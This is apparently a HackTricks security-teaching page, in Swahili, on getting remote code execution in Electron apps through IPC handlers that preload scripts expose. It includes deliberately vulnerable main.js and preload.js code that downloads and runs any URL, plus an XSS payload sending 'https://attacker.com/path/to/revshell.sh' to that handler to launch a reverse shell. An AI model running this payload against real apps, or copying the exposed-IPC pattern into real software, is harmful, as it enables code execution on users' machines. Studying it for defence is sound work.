HackTricksElectron contextIsolation RCE via IPC
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Ikiwa skripti ya preload inatoa mwisho wa IPC kutoka kwa faili ya main.js, mchakato wa renderer utaweza kuufikia na ikiwa unahatarisha, RCE inaweza kuwa inawezekana.
Mifano hii mingi ilichukuliwa kutoka hapa https://www.youtube.com/watch?v=xILfQGkLXQo. Angalia video kwa maelezo zaidi.
Mfano 0
Mfano kutoka https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21 (una mfano kamili wa jinsi MS Teams ilivyokuwa ikitumia XSS hadi RCE katika slaidi hizo, huu ni mfano wa msingi sana):
 (1) (1) (1) (1).png)
Mfano 1
Angalia jinsi main.js inavyosikiliza kwenye getUpdate na it download na kutekeleza URL yoyote iliyopitishwa.
Angalia pia jinsi preload.js inatoa tukio lolote la IPC kutoka kwa main.
// Part of code of main.js
ipcMain.on("getUpdate", (event, url) => {
console.log("getUpdate: " + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
})
mainWindow.webContents.session.on(
"will-download",
(event, item, webContents) => {
console.log("downloads path=" + app.getPath("downloads"))
console.log("mainWindow.download_url=" + mainWindow.download_url)
url_parts = mainWindow.download_url.split("/")
filename = url_parts[url_parts.length - 1]
mainWindow.downloadPath = app.getPath("downloads") + "/" + filename
console.log("downloadPath=" + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)
item.on("updated", (event, state) => {
if (state === "interrupted") {
console.log("Download is interrupted but can be resumed")
} else if (state === "progressing") {
if (item.isPaused()) console.log("Download is paused")
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})
item.once("done", (event, state) => {
if (state === "completed") {
console.log("Download successful, running update")
fs.chmodSync(mainWindow.downloadPath, 0755)
var child = require("child_process").execFile
child(mainWindow.downloadPath, function (err, data) {
if (err) {
console.error(err)
return
}
console.log(data.toString())
})
} else console.log(`Download failed: ${state}`)
})
}
)
// Part of code of preload.js
window.electronSend = (event, data) => {
ipcRenderer.send(event, data)
}
Kuvunja:
<script>
electronSend("getUpdate", "https://attacker.com/path/to/revshell.sh")
</script>
Mfano wa 2
Ikiwa skripti ya preload inatoa moja kwa moja kwa renderer njia ya kuita shell.openExternal inawezekana kupata RCE
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
shell.openExternal(url)
}
Mfano wa 3
Je, skripti ya preload inatoa njia za kuwasiliana kabisa na mchakato mkuu, XSS itakuwa na uwezo wa kutuma tukio lolote. Athari hii inategemea kile mchakato mkuu unachotoa katika suala la IPC.
window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb)
}
window.electronSend = (event, data) => {
ipcRenderer.send(event, data)
}
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.